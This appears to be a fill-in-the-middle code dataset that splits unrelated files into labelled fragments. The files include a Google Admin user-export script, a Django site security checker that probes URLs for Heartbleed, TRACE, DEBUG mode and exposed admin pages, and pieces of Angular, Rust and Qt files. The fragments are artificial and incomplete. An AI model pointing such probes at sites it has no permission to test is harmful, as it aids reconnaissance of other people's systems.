http = httplib2.Http()
httplib2.debuglevel = False #change this to True if you want to see the output
http = credentials.authorize(http=http)
directoryService = build(serviceName='admin', version='directory_v1', http=http)
#create and/or open a file that we'll append to
outputFileName = domain + '_userList.csv'
outputFile = open(outputFileName, 'a')
outputFile.write('primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath\n') #write the headers
pageToken = None #this is the variable where we'll store the next page token
while True:
try:
page = directoryService.users().list(domain=domain, customer=customerId, maxResults='500', pageToken=pageToken).execute()
users = page['users']
for user in users: #parse the users from the page variable
primaryEmail = user['primaryEmail']
lastLoginTime = user['lastLoginTime']
name = user['name']['fullName']
isAdmin = user['isAdmin']
orgUnitPath = user['orgUnitPath']
#print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
#log to a file
outputFile.write(primaryEmail + ',' + str(lastLoginTime) + ',' + name + ',' + str(isAdmin) + ',' + str(orgUnitPath))
outputFile.write( '\n')
pageToken = page['nextPageToken'] #this will error if there's no nextPageToken
except:
print 'We probably reached the end of ' + domain
break
outputFile.close()
#open and read the csv file that contains the list of domains, account numbers, and customer IDs
domainListFile = open('domainList.csv', 'rb')
domainList = csv.reader(domainListFile)
for row in domainList:
domain = row[0] #the first entry in this row is the domain
account = row[1]
customerId = row[2]
downloadUsers(domain, account, customerId) | primaryEmail = page.get(user['primaryEmail'])
lastLoginTime = page.get('lastLoginTime')
name = page.get('name')
isAdmin = page.get('isAdmin')
orgUnitPath = page.get('orgUnitPath')
newPage = page.get('nextPageToken')
print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
'''
'''
#create a user
userinfo = {'primaryEmail': '[email protected]',
'name': { 'givenName': 'New', 'familyName': 'Test' },
'password': 'passwordfornewuser1',
'orgUnitPath':'/Archive'}
directoryService.users().insert(body=userinfo).execute()
'''
'''
#move a user to an org
userOrg = {'orgUnitPath':'/Archive'}
directoryService.users().patch(userKey='[email protected]', body=userOrg).execute()
'''
'''
user = directoryService.users().get(userKey = '[email protected]')
pprint.pprint(user.execute())
''' |
'''
for user in page: | random_line_split |
oauth2_getAllUsers.py | #import some things we need
import httplib2
from oauth2client.client import SignedJwtAssertionCredentials #included with the Google Apps Directory API
from apiclient.discovery import build
import csv
def downloadUsers(domain, account, customerId):
superAdmin = 'is@' + domain
serviceAccount = account + '@developer.gserviceaccount.com'
p12File = domain + '.p12'
scope = 'https://www.googleapis.com/auth/admin.directory.user https://www.googleapis.com/auth/admin.directory.orgunit https://www.googleapis.com/auth/admin.directory.group https://www.googleapis.com/auth/admin.directory.device.chromeos'
#read then close the key file
keyFile = file(p12File, 'rb')
key = keyFile.read()
keyFile.close()
#build credentials
credentials = SignedJwtAssertionCredentials(serviceAccount, key, scope, prn=superAdmin)
#authenticate
http = httplib2.Http()
httplib2.debuglevel = False #change this to True if you want to see the output
http = credentials.authorize(http=http)
directoryService = build(serviceName='admin', version='directory_v1', http=http)
#create and/or open a file that we'll append to
outputFileName = domain + '_userList.csv'
outputFile = open(outputFileName, 'a')
outputFile.write('primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath\n') #write the headers
pageToken = None #this is the variable where we'll store the next page token
while True:
|
outputFile.close()
#open and read the csv file that contains the list of domains, account numbers, and customer IDs
domainListFile = open('domainList.csv', 'rb')
domainList = csv.reader(domainListFile)
for row in domainList:
domain = row[0] #the first entry in this row is the domain
account = row[1]
customerId = row[2]
downloadUsers(domain, account, customerId)
'''
for user in page:
primaryEmail = page.get(user['primaryEmail'])
lastLoginTime = page.get('lastLoginTime')
name = page.get('name')
isAdmin = page.get('isAdmin')
orgUnitPath = page.get('orgUnitPath')
newPage = page.get('nextPageToken')
print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
'''
'''
#create a user
userinfo = {'primaryEmail': '[email protected]',
'name': { 'givenName': 'New', 'familyName': 'Test' },
'password': 'passwordfornewuser1',
'orgUnitPath':'/Archive'}
directoryService.users().insert(body=userinfo).execute()
'''
'''
#move a user to an org
userOrg = {'orgUnitPath':'/Archive'}
directoryService.users().patch(userKey='[email protected]', body=userOrg).execute()
'''
'''
user = directoryService.users().get(userKey = '[email protected]')
pprint.pprint(user.execute())
'''
| try:
page = directoryService.users().list(domain=domain, customer=customerId, maxResults='500', pageToken=pageToken).execute()
users = page['users']
for user in users: #parse the users from the page variable
primaryEmail = user['primaryEmail']
lastLoginTime = user['lastLoginTime']
name = user['name']['fullName']
isAdmin = user['isAdmin']
orgUnitPath = user['orgUnitPath']
#print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
#log to a file
outputFile.write(primaryEmail + ',' + str(lastLoginTime) + ',' + name + ',' + str(isAdmin) + ',' + str(orgUnitPath))
outputFile.write( '\n')
pageToken = page['nextPageToken'] #this will error if there's no nextPageToken
except:
print 'We probably reached the end of ' + domain
break | conditional_block |
oauth2_getAllUsers.py | #import some things we need
import httplib2
from oauth2client.client import SignedJwtAssertionCredentials #included with the Google Apps Directory API
from apiclient.discovery import build
import csv
def | (domain, account, customerId):
superAdmin = 'is@' + domain
serviceAccount = account + '@developer.gserviceaccount.com'
p12File = domain + '.p12'
scope = 'https://www.googleapis.com/auth/admin.directory.user https://www.googleapis.com/auth/admin.directory.orgunit https://www.googleapis.com/auth/admin.directory.group https://www.googleapis.com/auth/admin.directory.device.chromeos'
#read then close the key file
keyFile = file(p12File, 'rb')
key = keyFile.read()
keyFile.close()
#build credentials
credentials = SignedJwtAssertionCredentials(serviceAccount, key, scope, prn=superAdmin)
#authenticate
http = httplib2.Http()
httplib2.debuglevel = False #change this to True if you want to see the output
http = credentials.authorize(http=http)
directoryService = build(serviceName='admin', version='directory_v1', http=http)
#create and/or open a file that we'll append to
outputFileName = domain + '_userList.csv'
outputFile = open(outputFileName, 'a')
outputFile.write('primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath\n') #write the headers
pageToken = None #this is the variable where we'll store the next page token
while True:
try:
page = directoryService.users().list(domain=domain, customer=customerId, maxResults='500', pageToken=pageToken).execute()
users = page['users']
for user in users: #parse the users from the page variable
primaryEmail = user['primaryEmail']
lastLoginTime = user['lastLoginTime']
name = user['name']['fullName']
isAdmin = user['isAdmin']
orgUnitPath = user['orgUnitPath']
#print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
#log to a file
outputFile.write(primaryEmail + ',' + str(lastLoginTime) + ',' + name + ',' + str(isAdmin) + ',' + str(orgUnitPath))
outputFile.write( '\n')
pageToken = page['nextPageToken'] #this will error if there's no nextPageToken
except:
print 'We probably reached the end of ' + domain
break
outputFile.close()
#open and read the csv file that contains the list of domains, account numbers, and customer IDs
domainListFile = open('domainList.csv', 'rb')
domainList = csv.reader(domainListFile)
for row in domainList:
domain = row[0] #the first entry in this row is the domain
account = row[1]
customerId = row[2]
downloadUsers(domain, account, customerId)
'''
for user in page:
primaryEmail = page.get(user['primaryEmail'])
lastLoginTime = page.get('lastLoginTime')
name = page.get('name')
isAdmin = page.get('isAdmin')
orgUnitPath = page.get('orgUnitPath')
newPage = page.get('nextPageToken')
print primaryEmail, lastLoginTime, name, isAdmin, orgUnitPath
'''
'''
#create a user
userinfo = {'primaryEmail': '[email protected]',
'name': { 'givenName': 'New', 'familyName': 'Test' },
'password': 'passwordfornewuser1',
'orgUnitPath':'/Archive'}
directoryService.users().insert(body=userinfo).execute()
'''
'''
#move a user to an org
userOrg = {'orgUnitPath':'/Archive'}
directoryService.users().patch(userKey='[email protected]', body=userOrg).execute()
'''
'''
user = directoryService.users().get(userKey = '[email protected]')
pprint.pprint(user.execute())
'''
| downloadUsers | identifier_name |
checker.py | # Create your views here.
import socket
from pyasn1.error import PyAsn1Error
import requests
from .heartbleed import test_heartbleed
from .models import Check
try:
from OpenSSL.SSL import Error as SSLError
except ImportError:
# In development, we might not have OpenSSL - it's only needed for SNI
class SSLError(Exception):
pass
class SecurityChecker(object):
def run_check(self, url):
self.session = requests.session()
self.session.headers = [('User-agent', "Sasha's pony checkup - http://ponycheckup.com/")]
try:
homepage = self.session.get(url, timeout=7)
check_record = Check(url=url)
check_record.hsts_header_found = self.check_supports_hsts(url)
check_record.xframe_header_found = True if 'X-Frame-Options' in homepage.headers else False
check_record.supports_https = self.check_supports_https(url)
check_record.heartbleed_vuln = self.check_heartbleed_vuln(url)
(check_record.admin_found, check_record.admin_forces_https) = self.check_admin(url)
(check_record.login_found, check_record.login_forces_https) = self.check_login(url)
check_record.allows_trace = self.check_trace(url)
check_record.runs_debug = self.check_runs_debug(url)
check_record.csrf_cookie_found = True if self.find_csrf_cookie() else False
session_cookie = self.find_session_cookie()
if session_cookie:
check_record.session_cookie_found = True
check_record.session_cookie_secure = session_cookie.secure
check_record.session_cookie_httponly = session_cookie.has_nonstandard_attr('httponly')
else:
check_record.session_cookie_found = False
check_record.update_recommendation_count()
check_record.save()
return check_record
except (requests.RequestException, SSLError, PyAsn1Error) as error:
return error
def check_supports_https(self, url):
try:
self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return True
def check_heartbleed_vuln(self, url):
try:
url = url.replace("http://", "").replace("/", "")
return bool(test_heartbleed(url))
except socket.error:
return False
def check_supports_hsts(self, url):
try:
ssltest = self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return 'Strict-Transport-Security' in ssltest.headers
def check_runs_debug(self, url):
data = self.session.get(url+"/[][][][][]-this-tries-to-trigger-404....", timeout=7)
return "You're seeing this error because you have <code>DEBUG = True</code>" in data.content
def check_trace(self, url):
response = self.session.request('TRACE', url, timeout=7)
return 'Content-Type' in response.headers and response.headers['Content-Type'] == "message/http"
def check_admin(self, url):
response = self.session.get(url + "/admin", timeout=7)
if response.status_code == 404:
return (False, None)
data = response.content.lower()
admin_found = '"id_username"' in data and ("csrfmiddlewaretoken" in data or "Django" in data or "__admin_media_prefix__" in data)
return (admin_found, self._response_used_https(response))
def check_login(self, url):
response = self.session.get(url + "/accounts/login", timeout=7)
if response.status_code == 404:
response = self.session.get(url + "/login", timeout=7)
if response.status_code == 404:
return (False, None)
return (True, self._response_used_https(response))
| return response.url[:5] == "https"
def find_session_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'sessionid':
return cookie
return False
def find_csrf_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'csrftoken':
return cookie
return False | def _response_used_https(self, response): | random_line_split |
checker.py | # Create your views here.
import socket
from pyasn1.error import PyAsn1Error
import requests
from .heartbleed import test_heartbleed
from .models import Check
try:
from OpenSSL.SSL import Error as SSLError
except ImportError:
# In development, we might not have OpenSSL - it's only needed for SNI
class SSLError(Exception):
pass
class SecurityChecker(object):
def run_check(self, url):
self.session = requests.session()
self.session.headers = [('User-agent', "Sasha's pony checkup - http://ponycheckup.com/")]
try:
homepage = self.session.get(url, timeout=7)
check_record = Check(url=url)
check_record.hsts_header_found = self.check_supports_hsts(url)
check_record.xframe_header_found = True if 'X-Frame-Options' in homepage.headers else False
check_record.supports_https = self.check_supports_https(url)
check_record.heartbleed_vuln = self.check_heartbleed_vuln(url)
(check_record.admin_found, check_record.admin_forces_https) = self.check_admin(url)
(check_record.login_found, check_record.login_forces_https) = self.check_login(url)
check_record.allows_trace = self.check_trace(url)
check_record.runs_debug = self.check_runs_debug(url)
check_record.csrf_cookie_found = True if self.find_csrf_cookie() else False
session_cookie = self.find_session_cookie()
if session_cookie:
check_record.session_cookie_found = True
check_record.session_cookie_secure = session_cookie.secure
check_record.session_cookie_httponly = session_cookie.has_nonstandard_attr('httponly')
else:
check_record.session_cookie_found = False
check_record.update_recommendation_count()
check_record.save()
return check_record
except (requests.RequestException, SSLError, PyAsn1Error) as error:
return error
def check_supports_https(self, url):
try:
self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return True
def check_heartbleed_vuln(self, url):
try:
url = url.replace("http://", "").replace("/", "")
return bool(test_heartbleed(url))
except socket.error:
return False
def check_supports_hsts(self, url):
try:
ssltest = self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return 'Strict-Transport-Security' in ssltest.headers
def check_runs_debug(self, url):
|
def check_trace(self, url):
response = self.session.request('TRACE', url, timeout=7)
return 'Content-Type' in response.headers and response.headers['Content-Type'] == "message/http"
def check_admin(self, url):
response = self.session.get(url + "/admin", timeout=7)
if response.status_code == 404:
return (False, None)
data = response.content.lower()
admin_found = '"id_username"' in data and ("csrfmiddlewaretoken" in data or "Django" in data or "__admin_media_prefix__" in data)
return (admin_found, self._response_used_https(response))
def check_login(self, url):
response = self.session.get(url + "/accounts/login", timeout=7)
if response.status_code == 404:
response = self.session.get(url + "/login", timeout=7)
if response.status_code == 404:
return (False, None)
return (True, self._response_used_https(response))
def _response_used_https(self, response):
return response.url[:5] == "https"
def find_session_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'sessionid':
return cookie
return False
def find_csrf_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'csrftoken':
return cookie
return False
| data = self.session.get(url+"/[][][][][]-this-tries-to-trigger-404....", timeout=7)
return "You're seeing this error because you have <code>DEBUG = True</code>" in data.content | identifier_body |
checker.py | # Create your views here.
import socket
from pyasn1.error import PyAsn1Error
import requests
from .heartbleed import test_heartbleed
from .models import Check
try:
from OpenSSL.SSL import Error as SSLError
except ImportError:
# In development, we might not have OpenSSL - it's only needed for SNI
class SSLError(Exception):
pass
class SecurityChecker(object):
def run_check(self, url):
self.session = requests.session()
self.session.headers = [('User-agent', "Sasha's pony checkup - http://ponycheckup.com/")]
try:
homepage = self.session.get(url, timeout=7)
check_record = Check(url=url)
check_record.hsts_header_found = self.check_supports_hsts(url)
check_record.xframe_header_found = True if 'X-Frame-Options' in homepage.headers else False
check_record.supports_https = self.check_supports_https(url)
check_record.heartbleed_vuln = self.check_heartbleed_vuln(url)
(check_record.admin_found, check_record.admin_forces_https) = self.check_admin(url)
(check_record.login_found, check_record.login_forces_https) = self.check_login(url)
check_record.allows_trace = self.check_trace(url)
check_record.runs_debug = self.check_runs_debug(url)
check_record.csrf_cookie_found = True if self.find_csrf_cookie() else False
session_cookie = self.find_session_cookie()
if session_cookie:
check_record.session_cookie_found = True
check_record.session_cookie_secure = session_cookie.secure
check_record.session_cookie_httponly = session_cookie.has_nonstandard_attr('httponly')
else:
check_record.session_cookie_found = False
check_record.update_recommendation_count()
check_record.save()
return check_record
except (requests.RequestException, SSLError, PyAsn1Error) as error:
return error
def | (self, url):
try:
self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return True
def check_heartbleed_vuln(self, url):
try:
url = url.replace("http://", "").replace("/", "")
return bool(test_heartbleed(url))
except socket.error:
return False
def check_supports_hsts(self, url):
try:
ssltest = self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return 'Strict-Transport-Security' in ssltest.headers
def check_runs_debug(self, url):
data = self.session.get(url+"/[][][][][]-this-tries-to-trigger-404....", timeout=7)
return "You're seeing this error because you have <code>DEBUG = True</code>" in data.content
def check_trace(self, url):
response = self.session.request('TRACE', url, timeout=7)
return 'Content-Type' in response.headers and response.headers['Content-Type'] == "message/http"
def check_admin(self, url):
response = self.session.get(url + "/admin", timeout=7)
if response.status_code == 404:
return (False, None)
data = response.content.lower()
admin_found = '"id_username"' in data and ("csrfmiddlewaretoken" in data or "Django" in data or "__admin_media_prefix__" in data)
return (admin_found, self._response_used_https(response))
def check_login(self, url):
response = self.session.get(url + "/accounts/login", timeout=7)
if response.status_code == 404:
response = self.session.get(url + "/login", timeout=7)
if response.status_code == 404:
return (False, None)
return (True, self._response_used_https(response))
def _response_used_https(self, response):
return response.url[:5] == "https"
def find_session_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'sessionid':
return cookie
return False
def find_csrf_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'csrftoken':
return cookie
return False
| check_supports_https | identifier_name |
checker.py | # Create your views here.
import socket
from pyasn1.error import PyAsn1Error
import requests
from .heartbleed import test_heartbleed
from .models import Check
try:
from OpenSSL.SSL import Error as SSLError
except ImportError:
# In development, we might not have OpenSSL - it's only needed for SNI
class SSLError(Exception):
pass
class SecurityChecker(object):
def run_check(self, url):
self.session = requests.session()
self.session.headers = [('User-agent', "Sasha's pony checkup - http://ponycheckup.com/")]
try:
homepage = self.session.get(url, timeout=7)
check_record = Check(url=url)
check_record.hsts_header_found = self.check_supports_hsts(url)
check_record.xframe_header_found = True if 'X-Frame-Options' in homepage.headers else False
check_record.supports_https = self.check_supports_https(url)
check_record.heartbleed_vuln = self.check_heartbleed_vuln(url)
(check_record.admin_found, check_record.admin_forces_https) = self.check_admin(url)
(check_record.login_found, check_record.login_forces_https) = self.check_login(url)
check_record.allows_trace = self.check_trace(url)
check_record.runs_debug = self.check_runs_debug(url)
check_record.csrf_cookie_found = True if self.find_csrf_cookie() else False
session_cookie = self.find_session_cookie()
if session_cookie:
check_record.session_cookie_found = True
check_record.session_cookie_secure = session_cookie.secure
check_record.session_cookie_httponly = session_cookie.has_nonstandard_attr('httponly')
else:
check_record.session_cookie_found = False
check_record.update_recommendation_count()
check_record.save()
return check_record
except (requests.RequestException, SSLError, PyAsn1Error) as error:
return error
def check_supports_https(self, url):
try:
self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return True
def check_heartbleed_vuln(self, url):
try:
url = url.replace("http://", "").replace("/", "")
return bool(test_heartbleed(url))
except socket.error:
return False
def check_supports_hsts(self, url):
try:
ssltest = self.session.get(url.replace("http", "https"), timeout=7)
except:
return False
return 'Strict-Transport-Security' in ssltest.headers
def check_runs_debug(self, url):
data = self.session.get(url+"/[][][][][]-this-tries-to-trigger-404....", timeout=7)
return "You're seeing this error because you have <code>DEBUG = True</code>" in data.content
def check_trace(self, url):
response = self.session.request('TRACE', url, timeout=7)
return 'Content-Type' in response.headers and response.headers['Content-Type'] == "message/http"
def check_admin(self, url):
response = self.session.get(url + "/admin", timeout=7)
if response.status_code == 404:
return (False, None)
data = response.content.lower()
admin_found = '"id_username"' in data and ("csrfmiddlewaretoken" in data or "Django" in data or "__admin_media_prefix__" in data)
return (admin_found, self._response_used_https(response))
def check_login(self, url):
response = self.session.get(url + "/accounts/login", timeout=7)
if response.status_code == 404:
response = self.session.get(url + "/login", timeout=7)
if response.status_code == 404:
return (False, None)
return (True, self._response_used_https(response))
def _response_used_https(self, response):
return response.url[:5] == "https"
def find_session_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'sessionid':
|
return False
def find_csrf_cookie(self):
for cookie in self.session.cookies:
if cookie.name == 'csrftoken':
return cookie
return False
| return cookie | conditional_block |
user-card.component.spec.ts | /*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and |
import { UserCardComponent } from "./user-card.component";
import { User } from "../../models";
describe("UserCardComponent", () => {
let component: UserCardComponent;
let fixture: ComponentFixture<UserCardComponent>;
beforeEach(waitForAsync(() => {
TestBed.configureTestingModule({
declarations: [ UserCardComponent ],
imports: [
HttpClientModule
]
})
.compileComponents();
}));
beforeEach(() => {
fixture = TestBed.createComponent(UserCardComponent);
component = fixture.componentInstance;
component.user = {lastUpdated: new Date(), id: 1, name: "test", username: "test", newUser: false} as User;
fixture.detectChanges();
});
it("should exist", () => {
expect(component).toBeTruthy();
});
afterAll(() => {
TestBed.resetTestingModule();
});
}); | * limitations under the License.
*/
import { HttpClientModule } from "@angular/common/http";
import { waitForAsync, ComponentFixture, TestBed } from "@angular/core/testing"; | random_line_split |
mod.rs | // The MIT License (MIT)
// | // in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
//! Native implementation for Mac OSX
pub use self::window::WindowImpl;
pub use self::window_mask::WindowMask;
pub mod window_mask;
pub mod cursor;
pub mod mouse;
pub mod keyboard;
pub mod gl;
pub mod context_settings;
mod window;
mod ffi; | // Copyright (c) 2014 Jeremy Letang
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal | random_line_split |
jingletransportrawudp.ts | <?xml version="1.0" ?><!DOCTYPE TS><TS language="pl" version="2.0">
<context>
<name>JingleTransportRawUdp</name>
<message>
<location filename="../../plugins/jingletransportrawudp/jingletransportrawudp.cpp" line="16"/>
<location filename="../../plugins/jingletransportrawudp/jingletransportrawudp.cpp" line="286"/>
<source>Jingle RAW-UDP Transport</source>
<translation type="unfinished"/>
</message>
<message>
<location filename="../../plugins/jingletransportrawudp/jingletransportrawudp.cpp" line="17"/>
<source>Implements XEP-0177: Jingle RAW-UDP transport method</source> | </message>
<message>
<location filename="../../plugins/jingletransportrawudp/jingletransportrawudp.cpp" line="287"/>
<source>Allows using RAW-UDP transport in Jingle sesions</source>
<translation type="unfinished"/>
</message>
</context>
</TS> | <translation type="unfinished"/> | random_line_split |
diagnostic.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
pub use self::Level::*;
pub use self::RenderSpan::*;
pub use self::ColorConfig::*;
use self::Destination::*;
use codemap::{self, COMMAND_LINE_SP, COMMAND_LINE_EXPN, Pos, Span};
use diagnostics;
use std::cell::{RefCell, Cell};
use std::{cmp, error, fmt};
use std::io::prelude::*;
use std::io;
use term::{self, WriterWrapper};
use libc;
/// maximum number of lines we will print for each error; arbitrary.
const MAX_LINES: usize = 6;
#[derive(Clone)]
pub enum RenderSpan {
/// A FullSpan renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary of
/// the source code covered by the span.
FullSpan(Span),
/// Similar to a FullSpan, but the cited position is the end of
/// the span, instead of the start. Used, at least, for telling
/// compiletest/runtest to look at the last line of the span
/// (since `end_highlight_lines` displays an arrow to the end
/// of the span).
EndSpan(Span),
/// A suggestion renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary
/// of hypothetical source code, where the `String` is spliced
/// into the lines in place of the code covered by the span.
Suggestion(Span, String),
/// A FileLine renders with just a line for the message prefixed
/// by file:linenum.
FileLine(Span),
}
impl RenderSpan {
fn span(&self) -> Span {
match *self {
FullSpan(s) |
Suggestion(s, _) |
EndSpan(s) |
FileLine(s) =>
s
}
}
}
#[derive(Clone, Copy)]
pub enum ColorConfig {
Auto,
Always,
Never
}
pub trait Emitter {
fn emit(&mut self, cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level);
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level);
}
/// Used as a return value to signify a fatal error occurred. (It is also
/// used as the argument to panic at the moment, but that will eventually
/// not be true.)
#[derive(Copy, Clone, Debug)]
#[must_use]
pub struct FatalError;
impl fmt::Display for FatalError {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser fatal error")
}
}
impl error::Error for FatalError {
fn description(&self) -> &str {
"The parser has encountered a fatal error"
}
}
/// Signifies that the compiler died with an explicit call to `.bug`
/// or `.span_bug` rather than a failed assertion, etc.
#[derive(Copy, Clone, Debug)]
pub struct ExplicitBug;
impl fmt::Display for ExplicitBug {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser internal bug")
}
}
impl error::Error for ExplicitBug {
fn description(&self) -> &str {
"The parser has encountered an internal bug"
}
}
/// A span-handler is like a handler but also
/// accepts span information for source-location
/// reporting.
pub struct SpanHandler {
pub handler: Handler,
pub cm: codemap::CodeMap,
}
impl SpanHandler {
pub fn new(handler: Handler, cm: codemap::CodeMap) -> SpanHandler {
SpanHandler {
handler: handler,
cm: cm,
}
}
pub fn span_fatal(&self, sp: Span, msg: &str) -> FatalError {
self.handler.emit(Some((&self.cm, sp)), msg, Fatal);
return FatalError;
}
pub fn span_fatal_with_code(&self, sp: Span, msg: &str, code: &str) -> FatalError {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Fatal);
return FatalError;
}
pub fn span_err(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Error);
self.handler.bump_err_count();
}
pub fn span_err_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Error);
self.handler.bump_err_count();
}
pub fn span_warn(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Warning);
}
pub fn span_warn_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Warning);
}
pub fn span_note(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Note);
}
pub fn span_end_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, EndSpan(sp), msg, Note);
}
pub fn span_help(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Help);
}
/// Prints out a message with a suggested edit of the code.
///
/// See `diagnostic::RenderSpan::Suggestion` for more information.
pub fn span_suggestion(&self, sp: Span, msg: &str, suggestion: String) {
self.handler.custom_emit(&self.cm, Suggestion(sp, suggestion), msg, Help);
}
pub fn fileline_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Note);
}
pub fn fileline_help(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Help);
}
pub fn span_bug(&self, sp: Span, msg: &str) -> ! {
self.handler.emit(Some((&self.cm, sp)), msg, Bug);
panic!(ExplicitBug);
}
pub fn span_unimpl(&self, sp: Span, msg: &str) -> ! {
self.span_bug(sp, &format!("unimplemented {}", msg));
}
pub fn handler<'a>(&'a self) -> &'a Handler {
&self.handler
}
}
/// A handler deals with errors; certain errors
/// (fatal, bug, unimpl) may cause immediate exit,
/// others log errors for later reporting.
pub struct Handler {
err_count: Cell<usize>,
emit: RefCell<Box<Emitter + Send>>,
pub can_emit_warnings: bool
}
impl Handler {
pub fn new(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>,
can_emit_warnings: bool) -> Handler {
let emitter = Box::new(EmitterWriter::stderr(color_config, registry));
Handler::with_emitter(can_emit_warnings, emitter)
}
pub fn with_emitter(can_emit_warnings: bool, e: Box<Emitter + Send>) -> Handler {
Handler {
err_count: Cell::new(0),
emit: RefCell::new(e),
can_emit_warnings: can_emit_warnings
}
}
pub fn fatal(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Fatal);
panic!(FatalError);
}
pub fn err(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Error);
self.bump_err_count();
}
pub fn bump_err_count(&self) {
self.err_count.set(self.err_count.get() + 1);
}
pub fn err_count(&self) -> usize {
self.err_count.get()
}
pub fn has_errors(&self) -> bool {
self.err_count.get() > 0
}
pub fn abort_if_errors(&self) {
let s;
match self.err_count.get() {
0 => return,
1 => s = "aborting due to previous error".to_string(),
_ => {
s = format!("aborting due to {} previous errors",
self.err_count.get());
}
}
self.fatal(&s[..]);
}
pub fn warn(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Warning);
}
pub fn note(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Note);
}
pub fn help(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Help);
}
pub fn bug(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Bug);
panic!(ExplicitBug);
}
pub fn unimpl(&self, msg: &str) -> ! {
self.bug(&format!("unimplemented {}", msg));
}
pub fn emit(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, None, lvl);
}
pub fn emit_with_code(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
code: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, Some(code), lvl);
}
pub fn custom_emit(&self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().custom_emit(cm, sp, msg, lvl);
}
}
#[derive(Copy, PartialEq, Clone, Debug)]
pub enum Level {
Bug,
Fatal,
Error,
Warning,
Note,
Help,
}
impl fmt::Display for Level {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
use std::fmt::Display;
match *self {
Bug => "error: internal compiler error".fmt(f),
Fatal | Error => "error".fmt(f),
Warning => "warning".fmt(f),
Note => "note".fmt(f),
Help => "help".fmt(f),
}
}
}
impl Level {
